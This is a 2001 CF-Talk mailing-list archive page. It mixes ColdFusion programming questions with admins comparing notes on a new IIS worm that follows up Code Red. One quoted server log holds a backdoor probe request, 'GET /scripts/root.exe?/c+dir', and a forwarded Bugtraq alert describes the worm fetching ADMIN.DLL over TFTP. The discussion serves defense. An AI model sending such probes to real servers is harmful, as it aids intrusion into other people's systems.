> are all in the same subnet: my ip is 209.186.186.37 and they 
> are all from 209.x.x.x

I just checked the logfile for one virtual server here, and I'm getting lots
of attacks from similar network addresses. I used a command-line HTTP
browser to connect to one of the attacking IPs, and saw the same
"readme.eml" thing, at the bottom of what appeared to be a regular page.

Based on my reading of the logfile, I think this is some Code Red variant or
followup; it's using the Code Red-specific backdoors mentioned in the
incidents.org URL Cameron posted. The only thing that doesn't sound right to
me is that I thought the Code Red trojan payload only worked with Win2K
(simply crashing IIS on NT 4), but several of the attacking servers are
identifying themselves as IIS 4.

Dave Watts, CTO, Fig Leaf Software 
http://www.figleaf.com/ 
voice: (202) 797-5496 

~~
Your ad could be here. Monies from ads go to support these lists and provide more 
resources for the community. http://www.fusionauthority.com/ads.cfm
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

RE: MSN

2001-09-18 Thread Paris Lundis


that would just pop open AIM on the local machine... it still requires 
AIM to be installed... it doesn't speak to the other client or a server 
directly :(


-paris
[finding the future in the past, passing the future in the present]
[connecting people, places and things]


-Original Message-
From: "Dan Phillips" <[EMAIL PROTECTED]>
Date: Tue, 18 Sep 2001 11:34:15 -0400
Subject: RE: MSN

>  HREF="aim:goim?screenname=username&message=Hello+there!.+How+are+
> you?">
> 
> Thank you,
> 
> Dan Phillips
> Lead Support Technician/ColdFusion Administrator
> Express Technologies, Inc.
> dba CFXhosting.com
> 
> -Original Message-
> From: BT [mailto:[EMAIL PROTECTED]]
> Sent: Tuesday, September 18, 2001 11:09 AM
> To: CF-Talk
> Subject: RE: MSN
> 
> 
> how can you send it to AIM?
> 
> 
> -Original Message-
> From: Dan Phillips [mailto:[EMAIL PROTECTED]]
> Sent: Tuesday, September 18, 2001 11:05 AM
> To: CF-Talk
> Subject: RE: MSN
> 
> 
> From what I have found, MSN is not too friendly when it comes to
> sending
> messages unless you use their client software. I know Yahoo, AIM, and
> ICQ
> all have a way that you can use HTML to send a message to users.
> 
> Thank you,
> 
> Dan Phillips
> Lead Support Technician/ColdFusion Administrator
> Express Technologies, Inc.
> dba CFXhosting.com
> 
> 
> 
> -Original Message-
> From: Rey Bango [mailto:[EMAIL PROTECTED]]
> Sent: Tuesday, September 18, 2001 10:52 AM
> To: CF-Talk
> Subject: Re: MSN
> 
> 
> AFAIK, they have no API for that. If you find it, please let me know.
> I've
> been wanting to add the functionality myself.
> 
> Rey...
> 
> - Original Message -
> From: "webmaster" <[EMAIL PROTECTED]>
> To: "CF-Talk" <[EMAIL PROTECTED]>
> Sent: Tuesday, September 18, 2001 10:49 AM
> Subject: MSN
> 
> 
> > Does anyone know how to send a MSN message from a CF app ?
> >
> >
> > TIA
> >
> > Richard
> >
> >
> 
> 
> 
> 
~~
Get the mailserver that powers this list at http://www.coolfusion.com
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

RE: Need help with error message.

2001-09-18 Thread Kelly Matthews

would probably help if you include the code that's throwing the error...

-Original Message-
From: Chris Bohill [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 11:23 AM
To: CF-Talk
Subject: Need help with error message.

Can anyone explain why I am getting this error message, when trying to
encrypt and decrypt details passed through pages as URL's.

Error Occurred While Processing Request Error Diagnostic Information Anerror
occurred while evaluating the expression: CI=
Decrypt(ToString(ToBinary(URL.Card_Id)),secret_key) Error near line 19,
column 10. 

The value to be decrypted is not valid The error occurred while
processing an element with a general identifier of (CFSET), occupying
document position (19:4) to (19:67).

Thanks,

Chris.

   Chris Bohill 
   WEB APPLICATIONS DEVELOPER

  Biznet 
Head Office 
133-137 Lisburn Road, Belfast 
Northern Ireland BT9 7AG 
T  +44 (0) 28 9022 3224 
F  +44 (0) 28 9022 3223 
E  [EMAIL PROTECTED]

W  biznet-solutions.com  

**

If you are not the intended recipient, or person responsible for
delivering it to the intended recipient, you are not authorized

to and must not disclose, copy, distribute or retain this message or any
part of it. 

The opinions / views / comments on this e-mail do not necessarily
reflect any views or policies of biznet

The recipient should check this email and any attachments for the
presence of viruses. biznet accepts no liability for any damage caused
by any virus transmitted by this email. biznet 2001.

**

~~
Your ad could be here. Monies from ads go to support these lists and provide more 
resources for the community. http://www.fusionauthority.com/ads.cfm
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

RE: OT: Macromedia Legal Issue

2001-09-18 Thread Joshua Miller

It's used as a tag because it's located in one directory on a server and
needs to be used on as many as 50 sites (virtual hosting, obviously) ...
rather than having all the code just copied and displayed in the source,
we're using the standard  ... since the
pages calling the scripts could be as many as 6 directories deep, it was
necessary to write a tag (or I suppose an include in a global includes
directory) to create the virtual path to any possible directory.

I'd be interested to know how calling a custom tag and calling an include
from a global include location differ in processing time. We haven't noticed
any significant change in load time, and since I'm on a whopping 26.4Kbps
(horrid dial-up) connection most days, I'd notice any performance lags.

Joshua Miller
Web Development::Programming
Eagle Technologies Group, Inc.
www.eagletgi.com
[EMAIL PROTECTED]

-Original Message-
From: Jeffry Houser [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 12:41 PM
To: CF-Talk
Subject: Re: OT: Macromedia Legal Issue

  This might better fit over on the CF-Partners list.
  I doubt there are any legal issues.

  I'm curious about the efficiency of a custom tag that does nothing but
drop in some custom JavaScripts.  Have you tested it for efficiency of
using a custom tag vs an include vs just putting it in the page?  For that
matter, has anyone done and number crunching for Custom Tag vs Include vs
just putting it in the page?

  Since JavaScript is not processed by CF, obviously just putting it into
the page is the most efficient.  I can see the benefits of using an include
if the same JavaScripts are used in many places.  I'm not sure why you
would want to make it into a custom tag.

At 09:37 AM 09/18/2001 -0400, you wrote:
>I know this is OT, but I thought those of you in this list would be best
>able to answer this question.
>
>We use Dreamweaver UD4 with CFStudio to build our applications, in doing
>this, we use some of the core MM JavaScript in our sites. We've recently
>created a common JavaScript library for all our sites using a CustomTag to
>call the script into any site. Included in this library, we added 3 or 4 of
>the core MM scripts we often use, is there a legal problem involved if
>someone downloads this library from us with the MM scripts attached? Is
>there a disclaimer we need to add or is this just something that MM expects
>will happen?
>
>Thanks,
>
>Joshua Miller
>Web Development::Programming
>Eagle Technologies Group, Inc.
>www.eagletgi.com
>[EMAIL PROTECTED]
>

~~
Your ad could be here. Monies from ads go to support these lists and provide more 
resources for the community. http://www.fusionauthority.com/ads.cfm
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

RE: Code Red backdoor triggered?

2001-09-18 Thread Tristram Charnley


Yes we're getting hammered too - exactly the same requests


Tristram Charnley

~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

RE: Code Red backdoor triggered?

2001-09-18 Thread Kola Oyedeji


This may or may not be relevant but i've just deleted an email from someone
i dont know which I'm  sure had a virus attached. It has a exe. file
attached called readme.exe. I recieved a virus warning and jsut deleted it!



Kola Oyedeji
Web developer
Macromedia Certified Advanced ColdFusion 5 Developer
http://www.Alexandermark.com
(+44)020-8429-7300


> -Original Message-
> From: Rich Wild [mailto:[EMAIL PROTECTED]]
> Sent: 18 September 2001 15:58
> To: CF-Talk
> Subject: RE: Code Red backdoor triggered?
>
>
> > Can you tell us Rich if it is impacting the servers ??
>
> nah - filling up firewall but nothing else.
>
> Are  you
> > patched, and does this thing use something new or is it the same
> > exploit as before...
>
> Yeah - we're patched
>
> dunno - we never got hit before.
>
> > -Original Message-
> > From: Paris Lundis [mailto:[EMAIL PROTECTED]]
> > Sent: 18 September 2001 16:03
> > To: CF-Talk
> > Subject: RE: Code Red backdoor triggered?
> >
> >
> > Uggh! not the code-red variations again...
> >
> > Can you tell us Rich if it is impacting the servers ?? Are  you
> > patched, and does this thing use something new or is it the same
> > exploit as before...
> >
> > Seems like it is becoming a net-30 terror :)
> >
> > -paris
> > [finding the future in the past, passing the future in the present]
> > [connecting people, places and things]
> >
> >
> > -Original Message-
> > From: Rich Wild <[EMAIL PROTECTED]>
> > Date: Tue, 18 Sep 2001 15:37:13 +0100
> > Subject: RE: Code Red backdoor triggered?
> >
> > > even we're getting hammered with syn flood attacks.
> > >
> > > Rich Wild
> > >
> > > > -Original Message-
> > > > From: Dave Watts [mailto:[EMAIL PROTECTED]]
> > > > Sent: 18 September 2001 15:52
> > > > To: CF-Talk
> > > > Subject: FW: Code Red backdoor triggered?
> > > >
> > > >
> > > > It seems there may be some unusual network activity today
> > > > worth noting.
> > > >
> > > > Dave Watts, CTO, Fig Leaf Software
> > > > http://www.figleaf.com/
> > > > voice: (202) 797-5496
> > > > fax: (202) 797-5444
> > > >
> > > >
> > > > -Original Message-
> > > > From: Dave Watts [mailto:[EMAIL PROTECTED]]
> > > > Sent: Tuesday, 18 September, 2001 10:49
> > > > To: [EMAIL PROTECTED]
> > > > Subject: RE: Code Red backdoor triggered?
> > > >
> > > >
> > > > > Heads up. Pay attention to your servers today. I just
> > > > > started detecting a *ton* of these requests. I think it's
> > > > > a follow-up worm programmed to take advantage of the
> > > > > backdoors Code Red dropped on infected computers. Maybe a
> > > > > Code Red III?
> > > > >
> > > > > -Cameron
> > > > >
> > > > > [09/18/2001 09:25:55.136 GMT-0400] Connection:
> > > > > dhcp181.onewebsystems.com
> > > > > (130.205.102.181) on port 80 (tcp).
> > > > > [09/18/2001 09:25:55.166 GMT-0400] GET
> > > > > /scripts/root.exe?/c+dir HTTP/1.0
> > > > > Host: www
> > > > > Connnection: close
> > > >
> > > > After a more careful reading, I don't think this is an attack
> > > > at all. I
> > > > think it's worse than an attack.
> > > >
> > > > The GET request doesn't do anything except run the DOS dir
> > > > command using the
> > > > command processor. But, if a server responds with an HTTP 200
> > > > status code,
> > > > this indicates that the server is vulnerable to running
> > > > cmd.exe through the
> > > > web server.
> > > >
> > > > So, my guess is that this is a vulnerability scan. Once a
> > > > list of vulnerable
> > > > servers is compiled, a real attack would take much less time
> > > > than a Code
> > > > Red-style attack, since you could build the list of
> > > > vulnerable servers into
> > > > the attack code!
> > > >
> > > > This idea has been discussed a bit in the last month or so -
> > > > it's called a
> > > > "Warhol" worm, the idea being that an attack might
> cover the mass
> > > of
> > > > vulnerable machines in fifteen minutes. Here's a URL to the
> > > article:
> > > >
> > > > http://hacktivism.openflows.org/article.pl?sid=01/08/13/123724
> > > 5&mode=nocomme
> > > nt&threshold=
> > >
> > > Dave Watts, CTO, Fig Leaf Software
> > > http://www.figleaf.com/
> > > voice: (202) 797-5496
> > > fax: (202) 797-5444
> > >
> >
> -
> > > ---
> > > 
> > > Control your subscriptions to ACFUG lists via the ACFUG website at
> > >
> > >
> >
> 
~~
Get the mailserver that powers this list at http://www.coolfusion.com
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

RE: Need help with error message.

2001-09-18 Thread Billy Cravens


Why the ToString and ToBinary conversions? Are you using these when you
encrypt?

---
Billy Cravens
Web Development, EDS
[EMAIL PROTECTED]


-Original Message-
From: Chris Bohill [mailto:[EMAIL PROTECTED]] 
Sent: Tuesday, September 18, 2001 10:23 AM
To: CF-Talk
Subject: Need help with error message.


Can anyone explain why I am getting this error message, when trying to
encrypt and decrypt details passed through pages as URL's.


Error Occurred While Processing Request Error Diagnostic Information
Anerror occurred while evaluating the expression: CI=
Decrypt(ToString(ToBinary(URL.Card_Id)),secret_key) Error near line 19,
column 10. 

The value to be decrypted is not valid The error occurred while
processing an element with a general identifier of (CFSET), occupying
document position (19:4) to (19:67).

Thanks,

Chris.

   Chris Bohill 
   WEB APPLICATIONS DEVELOPER

  Biznet 
Head Office 
133-137 Lisburn Road, Belfast 
Northern Ireland BT9 7AG 
T  +44 (0) 28 9022 3224 
F  +44 (0) 28 9022 3223 
E  [EMAIL PROTECTED]
 
W  biznet-solutions.com  

 


**

If you are not the intended recipient, or person responsible for
delivering it to the intended recipient, you are not authorized

to and must not disclose, copy, distribute or retain this message or any
part of it. 

The opinions / views / comments on this e-mail do not necessarily
reflect any views or policies of biznet

The recipient should check this email and any attachments for the
presence of viruses. biznet accepts no liability for any damage caused
by any virus transmitted by this email. biznet 2001.


**


~~
Get the mailserver that powers this list at http://www.coolfusion.com
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

RE: OT

2001-09-18 Thread Billy Cravens


15Seconds.com's list is good.

---
Billy Cravens
Web Development, EDS
[EMAIL PROTECTED]


-Original Message-
From: Rich Tretola [mailto:[EMAIL PROTECTED]] 
Sent: Monday, September 17, 2001 6:03 PM
To: CF-Talk
Subject: OT


Can anyone recommend an ASP mailing list?

Thanks,

~~
Get the mailserver that powers this list at http://www.coolfusion.com
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

RE: IIS4 Programatically enter redirections

2001-09-18 Thread Billy Cravens


You can program against IIS using ADSI.  To do it in CF, you'll need to
write a VB COM wrapper that gets called via CFOBJECT.  Do a search on
MSDN for IIS and ADSI.

---
Billy Cravens
Web Development, EDS
[EMAIL PROTECTED]


-Original Message-
From: Job Blogss [mailto:[EMAIL PROTECTED]] 
Sent: Tuesday, September 18, 2001 9:28 AM
To: CF-Talk
Subject: OT: IIS4 Programatically enter redirections


Hello all,

Is there any way to programatically add redirections into IIS4 on NT via
cf, 
vb etc or some other means (without using the iis administrator)?  Does
the 
administrator take any command line parameters to add redirections?  I 
searched the registry for current redirections but I can't find them.
Does 
anyone know where they are stored?

Thanks in advance!

-John



~~
Get the mailserver that powers this list at http://www.coolfusion.com
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

Fw: Alert: Some sort of IIS worm seems to be propagating

2001-09-18 Thread Paul Hastings


lots more info...off bugtraq

- Original Message - 
From: "Russ" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Tuesday, September 18, 2001 10:21 PM
Subject: Alert: Some sort of IIS worm seems to be propagating


> -BEGIN PGP SIGNED MESSAGE-
> 
> There have been numerous reports of IIS attacks being generated by
> machines over a broad range of IP addresses. These "infected"
> machines are using a wide variety of attacks which attempt to exploit
> already known and patched vulnerabilities against IIS.
> 
> It appears that the attacks can come both from email and from the
> network.
> 
> A new worm, being called w32.nimda.amm, is being sent around. The
> attachment is called README.EXE and comes as a MIME-type of
> "audio/x-wav" together with some html parts. There appears to be no
> text in this message when it is displayed by Outlook when in
> Auto-Preview mode (always a good indication there's something not
> quite right with an email.)
> 
> The network attacks against IIS boxes are a wide variety of attacks.
> Amongst them appear to be several attacks that assume the machine is
> compromised by Code Red II (looking for ROOT.EXE in the /scripts and
> /msadc directory, as well as an attempt to use the /c and /d virtual
> roots to get to CMD.EXE). Further, it attempts to exploit numerous
> other known IIS vulnerabilities.
> 
> One thing to note is the attempt to execute TFTP.EXE to download a
> file called ADMIN.DLL from (presumably) some previously compromised
> box.
> 
> Anyone who discovers a compromised machine (a machine with ADMIN.DLL
> in the /scripts directory), please forward me a copy of that .dll
> ASAP.
> 
> Also, look for TFTP traffic (UDP69). As a safeguard, consider doing
> the following;
> 
> edit %systemroot/system32/drivers/etc/services.
> 
> change the line;
> 
> tftp 69/udp
> 
> to;
> 
> tftp 0/udp
> 
> thereby disabling the TFTP client. W2K has TFTP.EXE protected by
> Windows File Protection so can't be removed.
> 
> More information as it arises.
> 
> Cheers,
> Russ - Surgeon General of TruSecure Corporation/NTBugtraq Editor

~~
Get the mailserver that powers this list at http://www.coolfusion.com
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

RE: MSN

2001-09-18 Thread Billy Cravens


If AIM is installed, doesn't it provide support for a proprietary
protocol (aim://) in the browser?

Also, I know that some software (like Jabber) can talk to a number of
these services at a pretty low level.  Some of it is even open source -
perhaps you could pull some code off of SourceForge and write your own
back-end

---
Billy Cravens
Web Development, EDS
[EMAIL PROTECTED]


-Original Message-
From: BT [mailto:[EMAIL PROTECTED]] 
Sent: Tuesday, September 18, 2001 10:09 AM
To: CF-Talk
Subject: RE: MSN


how can you send it to AIM?


-Original Message-
From: Dan Phillips [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 11:05 AM
To: CF-Talk
Subject: RE: MSN


>From what I have found, MSN is not too friendly when it comes to sending
messages unless you use their client software. I know Yahoo, AIM, and
ICQ all have a way that you can use HTML to send a message to users.

Thank you,

Dan Phillips
Lead Support Technician/ColdFusion Administrator
Express Technologies, Inc.
dba CFXhosting.com



-Original Message-
From: Rey Bango [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 10:52 AM
To: CF-Talk
Subject: Re: MSN


AFAIK, they have no API for that. If you find it, please let me know.
I've been wanting to add the functionality myself.

Rey...

- Original Message -
From: "webmaster" <[EMAIL PROTECTED]>
To: "CF-Talk" <[EMAIL PROTECTED]>
Sent: Tuesday, September 18, 2001 10:49 AM
Subject: MSN


> Does anyone know how to send a MSN message from a CF app ?
>
>
> TIA
>
> Richard
>
>



~~
Get the mailserver that powers this list at http://www.coolfusion.com
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

Re: Code Red backdoor triggered?

2001-09-18 Thread Jochem van Dieten

Jay Sudowski - Handy Networks LLC wrote:

> Gr.  We're getting hammered with something across three of our
> servers. Data transfer is up 600% compared to normal.
> 
> Today is gonna be one of those days ...

We are seeing a slight increase in traffic as of 13:05 UTC today. From 
the log files it appears to be a combination of Code Red II and the new 
Code Blue/Code Red III or whatever it is called (the one that tries to 
exploit the directory traversal bug). But it is not as bad as last time. 
On the least busy segment it shows as a 10% traffic increase, but it 
doesn't show at all on the Gb links.

Isn't Code Red set to activate around the 19th of every month?

Jochem

~~
Your ad could be here. Monies from ads go to support these lists and provide more 
resources for the community. http://www.fusionauthority.com/ads.cfm
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

RE: Code Red backdoor triggered?

2001-09-18 Thread Star Interactive (John Ceci)


Yeah, eml is a email file...

Looks as though this is a new IIS whole...



-Original Message-
From: Carlisle, Eric [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 10:14 AM
To: CF-Talk
Subject: RE: Code Red backdoor triggered?


I'll show my ignorance.
A .eml file is a kind of MS spool file, right?
Does the virus pose as one of these files?

EC

-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 12:02 PM
To: CF-Talk
Subject: RE: Code Red backdoor triggered?


Check for *.eml files on your IIS boxes, we got them everywhere...and our
virus software is not picking anything up at all...



-Original Message-
From: Rich Wild [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 9:37 AM
To: CF-Talk
Subject: RE: Code Red backdoor triggered?


even we're getting hammered with syn flood attacks.

Rich Wild

> -Original Message-
> From: Dave Watts [mailto:[EMAIL PROTECTED]]
> Sent: 18 September 2001 15:52
> To: CF-Talk
> Subject: FW: Code Red backdoor triggered?
>
>
> It seems there may be some unusual network activity today
> worth noting.
>
> Dave Watts, CTO, Fig Leaf Software
> http://www.figleaf.com/
> voice: (202) 797-5496
> fax: (202) 797-5444
>
>
> -Original Message-
> From: Dave Watts [mailto:[EMAIL PROTECTED]]
> Sent: Tuesday, 18 September, 2001 10:49
> To: [EMAIL PROTECTED]
> Subject: RE: Code Red backdoor triggered?
>
>
> > Heads up. Pay attention to your servers today. I just
> > started detecting a *ton* of these requests. I think it's
> > a follow-up worm programmed to take advantage of the
> > backdoors Code Red dropped on infected computers. Maybe a
> > Code Red III?
> >
> > -Cameron
> >
> > [09/18/2001 09:25:55.136 GMT-0400] Connection:
> > dhcp181.onewebsystems.com
> > (130.205.102.181) on port 80 (tcp).
> > [09/18/2001 09:25:55.166 GMT-0400] GET
> > /scripts/root.exe?/c+dir HTTP/1.0
> > Host: www
> > Connnection: close
>
> After a more careful reading, I don't think this is an attack
> at all. I
> think it's worse than an attack.
>
> The GET request doesn't do anything except run the DOS dir
> command using the
> command processor. But, if a server responds with an HTTP 200
> status code,
> this indicates that the server is vulnerable to running
> cmd.exe through the
> web server.
>
> So, my guess is that this is a vulnerability scan. Once a
> list of vulnerable
> servers is compiled, a real attack would take much less time
> than a Code
> Red-style attack, since you could build the list of
> vulnerable servers into
> the attack code!
>
> This idea has been discussed a bit in the last month or so -
> it's called a
> "Warhol" worm, the idea being that an attack might cover the mass of
> vulnerable machines in fifteen minutes. Here's a URL to the article:
>
> http://hacktivism.openflows.org/article.pl?sid=01/08/13/123724
5&mode=nocomme
nt&threshold=

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
voice: (202) 797-5496
fax: (202) 797-5444


Control your subscriptions to ACFUG lists via the ACFUG website at




~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

Best way to compare dates in the database?

2001-09-18 Thread Kola Oyedeji


Hi

I have an access database which has dates stored in the format:
18/9/01
however when I try to compare dates in using a where clause I get no
matches despite the dates bieng the same format (and no spaces or seconds).
My question is what is the best way to store dates so that they can be
easily matched to other dates using a query not a coldfusion function?


Thanks in advance

KOla

Kola Oyedeji
Web developer
Macromedia Certified Advanced ColdFusion 5 Developer
http://www.Alexandermark.com
(+44)020-8429-7300


> -Original Message-
> From: Dennis Powers [mailto:[EMAIL PROTECTED]]
> Sent: 18 September 2001 16:16
> To: CF-Talk
> Subject: RE: MSN
>
>
> I believe that the MSN Messenger uses a UDP protocol to
> communicate. If so
> you might be able to use the IntraFoundation UDPClient
> FREEWARE COM Object.
>
> http://www.intrafoundation.com/udpclient.html
>
>
>
>
> Best regards,
>
> Dennis Powers
> UXB Internet
> (203)879-2844
> http://www.uxbinfo.com/
>
> -Original Message-
> From: webmaster [mailto:[EMAIL PROTECTED]]
> Sent: Tuesday, September 18, 2001 10:50 AM
> To: CF-Talk
> Subject: MSN
>
> Does anyone know how to send a MSN message from a CF app ?
>
>
> TIA
>
> Richard
>
>
> 
~~
Get the mailserver that powers this list at http://www.coolfusion.com
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

RE: Format Tables (Was RE: CF to excel)

2001-09-18 Thread Janine Jakim


Ok I answered question 2.  I found that using
#Skill# will go through all the skills so that
I don't need to do Skill1, Skill2, Skill3
Now I still have the issue of my headers showing up before each student.
This is my code:



 #Skill#
   


#LASTNAME#, #FIRSTNAME#

  
 #Grade#
 




-Original Message-
From: cf refactoring [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 10:38 AM
To: CF-Talk
Subject: Re: Format Tables (Was RE: CF to excel)


Can you show us the looping code? It's probably an
error in reusing too much of the sample code

--- Janine Jakim <[EMAIL PROTECTED]> wrote:
> Thanks for all the input. Now for the next question.
>  I am having a hard
> time formatting my html table correctly. I am using
> #Skill[1]#
> #Skill[2]# in the heading (I have also
> tried making it just a
> regular .  But unfortunately it is
> giving each student a
> heading.
> ie:   Reading MathSpelling
> JSmithA   A   A
>   Reading MathSpelling
> SJonesB   B   B
> 
> So I have 2 questions:
> 1. Is there a way to get the heading to be for the
> whole page when I am
> using a variable?
> 2.  Is there a way to make the #skill[1]#
> #Skill[2]#, etc. expand/constrict
> accordingly.
> (ie: 5th grade Math has 3 skills/ reading has 16
> skills whereas 1st grade
> math has 21 skills and 19 reading skills) I
> don't want to have to make a
> different page for each subject/grade.  If I just
> put #Skill# in the header
> it only gives me the 1st skill... Any ideas???
> 
> -Original Message-
> From: John Anderson [mailto:[EMAIL PROTECTED]]
> Sent: Monday, September 17, 2001 4:00 PM
> To: CF-Talk
> Subject: RE: CF to excel
> 
> 
> You can create an html table and output that is an
> excel file as follows:
> 
> 
> 
> 
>   
>   
>   First Name">
>   Last
> Name">
>   Office
> Phone">
>   Mobile
> Phone">
>&"Pager">
>   
>   
&"#empfirstname##emplastname##officep##ce
> ll##pager#">
>   
>   ">
>   
> 
> 
> 
> 
> #excelstring#
> 
> 
> 
> This output string that you have built will come
> across as an excel file.
> 
> The key is in the cfcontent tag and cfheader tag.
> 
> John Anderson
> aloha-webdesign.com
> 
> -Original Message-
> From: Janine Jakim [mailto:[EMAIL PROTECTED]]
> Sent: Monday, September 17, 2001 12:40 PM
> To: CF-Talk
> Subject: CF to excel
> 
> 
> How flexible is the process of generating excel
> files?
> I need to have an output that is dynamic for the
> columns and rows.
> For example:
> 
>   #student#   #student#   #student#   #student#
> #Skill#   #grade# #grade# #grade# #grade#
> #Skill#   #grade# #grade# #grade# #grade#
> #Skill#   #grade# #grade# #grade# #grade#
> 
> Translating into:
>   JohnSmith   JanSmithSamJonessandyJones
> Reading   C  A   A   B
> Math  B  A   B   A
> English   B  B   A   C
> 
> My tables are normalized. There are many tables that
> make this info.
> 1.  One reference table that lists all the skills. 
> 2.  One table that shows student information.
> 3.  One table that lists the studentID/skillID/Grade
> (hooks the student info
> with the skills reference table).
> 4.  One reference table that lists the quarter and
> dates of the quarter so
> only the current quarter prints out.
> Is this possible?
> What are the steps to making it so?  Do I need to
> make the information into
> an array(s) first?
> I've read the how to from Ben's CF5 book and the
> tutorial from cfcomet.com-
> but of course I want to make things more difficult.
> Thanks in advance.
> 
> 
> 

~~
Get the mailserver that powers this list at http://www.coolfusion.com
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

RE: checkboxes to action pages

2001-09-18 Thread Andy Ewings


Mike

I assume the check boxes represent the same "field" in the database?  So for
example you might have three checkboxes for 3 employees called Andy, Mike
and Steve and you want to delete the employees whose box is checked?  If
this is the case then..

All of your boxes should be called the same name but each should have a
different value representing the item in question.  so for the above example
your 3 checkboxes would all be called name but would have 3 integer values -
1,2,3 representing "Andy", "Steve" and "Mike" respectively (if that was
their reoresentation within the db).  Then in the action page, if you had
checked all three the value of form.name would be "1,2,3".  Your SQL
statement would then be something DELETE * FROM employee WHERE ID IN
(#form.name#).

If your checkboxes contain text values then this becomes a bit more tricky
as the SQL statement would require single quotes around each element in the
list.

HTH
-- 
Andrew Ewings
Project Manager
Thoughtbubble Ltd 
http://www.thoughtbubble.net 
-- 
United Kingdom 
http://www.thoughtbubble.co.uk/ 
Tel: +44 (0) 20 7387 8890 
-- 
New Zealand 
http://www.thoughtbubble.co.nz/ 
Tel: +64 (0) 9 488 9131 
-- 
The information in this email and in any attachments is confidential and
intended solely for the attention and use of the named addressee(s). Any
views or opinions presented are solely those of the author and do not
necessarily represent those of Thoughtbubble. This information may be
subject to legal, professional or other privilege and further distribution
of it is strictly prohibited without our authority. If you are not the
intended recipient, you are not authorised to disclose, copy, distribute, or
retain this message. Please notify us on +44 (0)207 387 8890.



-Original Message-
From: Michael Vinson [mailto:[EMAIL PROTECTED]]
Sent: 18 September 2001 15:34
To: CF-Talk
Subject: checkboxes to action pages


Hi,

I have a list of records (to delete) with checkboxes. i.e. user wants to
delete recs & clicks checkbox
Once the user clicks submit (Delete) Here's what I know:
- How many items in the list
- My 'index' to the list (using email address), which contains a subset
of the query displayed in the form. Note that the number of email
addresses I capture is equal to the total number of items in list.

Here's what do not know:
- How to match my form checkbox name (delChecked) to my data as
described above! The parameters that get passed to my 'action page'
reveal (to me, at least) a compressed list showing data (e.g. on,on,on)
but how in the world do I match this to... item 1 checked, item 3
checked, item 5 checked

Ain't learning great!

Thank in advance ... -Mike

~~
Get the mailserver that powers this list at http://www.coolfusion.com
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

RE: MSN

2001-09-18 Thread Dan Phillips




Thank you,

Dan Phillips
Lead Support Technician/ColdFusion Administrator
Express Technologies, Inc.
dba CFXhosting.com

-Original Message-
From: BT [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 11:09 AM
To: CF-Talk
Subject: RE: MSN


how can you send it to AIM?


-Original Message-
From: Dan Phillips [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 11:05 AM
To: CF-Talk
Subject: RE: MSN


